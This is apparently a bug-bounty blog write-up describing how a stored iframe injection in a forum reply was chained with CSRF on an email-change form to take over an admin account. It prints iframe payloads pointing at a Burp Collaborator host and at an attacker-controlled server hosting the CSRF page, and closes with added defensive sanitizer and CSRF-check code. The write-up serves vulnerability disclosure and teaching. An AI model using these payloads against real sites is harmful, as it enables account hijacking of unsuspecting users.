Stored Iframe Injection + CSRF = Account Takeover 😎😎

Rounak Dhadiwal
3 min read · Dec 16, 2019


Before we start, let's clear up some questions.

1. What is Iframe Injection?

Frame injection is a type of code injection vulnerability in which an attacker can inject frames that contain links to malicious websites or advertisements. To know more about Iframe Injection you can click here.

2. After injecting the iframe into the page, who actually loads the iframe: the client's browser or the server?

Iframes injected into web pages are mostly loaded by the client's browser, except in some cases such as PDF generators. To check who is loading the injected frame, inject a frame whose source is a Burp Collaborator host, e.g. [<iframe src=xxxxxx.burpcollaborator.net></iframe>]; checking the Burp Collaborator logs will reveal the caller of the frame (the client's browser or the server). 😮😮

3. What is Cross-Site Request Forgery (CSRF)?

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. To learn more about CSRF you can visit PortSwigger.

So let's get started.

When you start to hunt on a particular domain, the best thing to do first is to take a look at all the features of the domain and take notes. Understanding the flow of a particular website will help you chain attacks and logically break it. It was a private program, so let's call the site ABC.com.

After looking at all the features, I found that there is a discussion forum where all the members of the community can chat with each other.

Here you can start a topic and discuss it with your community members.

So I started to inject my payloads in the reply feature, and concluded that the reply section was vulnerable to HTML injection but not to XSS. I tried many XSS payloads but didn't succeed.

So I tried to inject an iframe and BOOM! It was reflected. 😋 😋 My next task was to increase the impact of this vulnerability, 😮😮 so I started looking at the other features of the website too.

After some time I came across a section where I was able to change my email address.

The first thing that came to my mind was to try a CSRF attack. The request to change the email looked like this:

This confirmed that the email change feature is vulnerable to CSRF. So I quickly generated the HTML code.

But to perform a CSRF attack, the victim must visit a particular link from which the request to change the email will be sent. This was not possible here because the admin would not click on any malicious link. So I thought, let's combine the CSRF with the iframe injection I found earlier.

So I started my AWS server (let's say it has the IP [x.x.x.x]) and copied the CSRF code into an index.html page.

After that I injected the iframe payload, i.e. <iframe src="http://x.x.x.x/index.html"></iframe>, in the discussion forum, and it was GAME OVER for the admin after viewing the discussion forum, because his email ID was changed to the attacker's email ID.

ATTACK SCENARIO:

  1. The attacker injects an iframe into the discussion forum that points to the page hosting the email change request.
  2. When the victim or admin visits the discussion forum, their browser loads the iframe, which sends the email change request from the victim's machine.
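Both links in this chain are fixable server-side, and as an added example (not code from the original post or the program described) here is a defensive counterpart: an allowlist sanitizer for forum replies that drops iframe/script tags together with their content, and a check for the email-change handler that requires a per-session CSRF token and, when a browser sends one, a matching Origin header. Tag and attribute allowlists, function names and the site origin are assumptions for illustration.

```python
import hmac
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")
DROPPED_WITH_CONTENT = {"iframe", "script", "object", "embed", "style"}

class ReplySanitizer(HTMLParser):
    """Rebuild a reply from an allowlist; dropped tags lose their content."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip_depth = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROPPED_WITH_CONTENT:
            self.skip_depth += 1
        elif tag in ALLOWED_TAGS and not self.skip_depth:
            # keep only allowlisted attributes whose value is an http(s) URL
            kept = "".join(
                f' {n}="{escape(v, quote=True)}"' for n, v in attrs
                if n in ALLOWED_ATTRS.get(tag, ()) and v
                and v.lower().startswith(SAFE_SCHEMES))
            self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in DROPPED_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in ALLOWED_TAGS and not self.skip_depth and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))  # text is re-escaped on output

def sanitize_reply(raw_html):
    p = ReplySanitizer()
    p.feed(raw_html)
    p.close()
    return "".join(p.out)

def email_change_allowed(session_token, submitted_token, origin, site_origin):
    """Email-change handler check: the per-session CSRF token must match and,
    when the browser sends an Origin header, it must be our own site."""
    if not session_token or not submitted_token:
        return False
    if origin is not None and origin != site_origin:
        return False
    return hmac.compare_digest(session_token, submitted_token)
```

With both in place, the injected frame never reaches other users' browsers, and even a forged request from the attacker's host fails the token and Origin checks.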

Thank you for reading. 😊😊
